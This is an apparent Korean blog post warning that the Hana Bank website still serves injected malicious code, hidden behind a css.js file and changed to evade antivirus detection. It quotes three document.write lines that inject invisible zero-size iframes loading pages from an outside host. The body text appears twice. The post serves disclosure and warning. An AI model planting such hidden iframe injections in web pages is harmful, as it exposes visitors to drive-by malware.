하나은행 홈페이지에 악성코드
시스템/IT/탐나는정보들엇그제 하나은행 홈페이지에 악성코드가 심어져있다라는 글을 남긴적이 있다.
http://www.carstory.co.kr/468
아직도 그대로 방치되고 있고, 현재는 실시간에도 걸리지 않는다.
그리고 몇일 후 인데, 현재 그 악성코드 심어놓은것에 대한 패턴을 바꾸어서
N사의 실시간 탐지에도 걸리지 않고, 웹상에 그대로 방치가 되고 있다.
ocument.write("<iframe width=0 height=0 src=http://news.max3gp.com/news.htm></iframe>");
document.write("<iframe width=0 height=0 src=http://news.max3gp.com/rss.htm></iframe>");
document.write("<iframe width='0' height='0' src='http://news.max3gp.com/dd.htm'></iframe>");
~
하나은행 홈페이지에서 css.js 로 연결이 되어 눈속임으로 처리하였고
위 내용으로 되어져 있는걸 보면, 저 코드 삽입자가 주소를 바꾸고 코드를
수정한것을 알수가 있다.
참고로 news.htm의 코드
코드 내용은 몇일전 포스팅한 내용의 거의 유사하다
http://www.carstory.co.kr/468 참고하길
http://www.carstory.co.kr/468
아직도 그대로 방치되고 있고, 현재는 실시간에도 걸리지 않는다.
그리고 몇일 후 인데, 현재 그 악성코드 심어놓은것에 대한 패턴을 바꾸어서
N사의 실시간 탐지에도 걸리지 않고, 웹상에 그대로 방치가 되고 있다.
ocument.write("<iframe width=0 height=0 src=http://news.max3gp.com/news.htm></iframe>");
document.write("<iframe width=0 height=0 src=http://news.max3gp.com/rss.htm></iframe>");
document.write("<iframe width='0' height='0' src='http://news.max3gp.com/dd.htm'></iframe>");
~
하나은행 홈페이지에서 css.js 로 연결이 되어 눈속임으로 처리하였고
위 내용으로 되어져 있는걸 보면, 저 코드 삽입자가 주소를 바꾸고 코드를
수정한것을 알수가 있다.
참고로 news.htm의 코드
코드 내용은 몇일전 포스팅한 내용의 거의 유사하다
http://www.carstory.co.kr/468 참고하길
'시스템/IT/탐나는정보들' 카테고리의 다른 글
가지고 싶은 시스템 또하나요~ (1) | 2008.02.15 |
---|---|
커널모듈을 통한 vmsplice() local root exploit 취약점에 대한 방어 모듈 (4) | 2008.02.11 |
하나은행 인터넷 뱅킹 홈페이지에 악성코드가? (5) | 2008.02.02 |
다시 리눅스로... (0) | 2008.01.19 |
모토로라 휴대폰 암호해독 (4) | 2008.01.14 |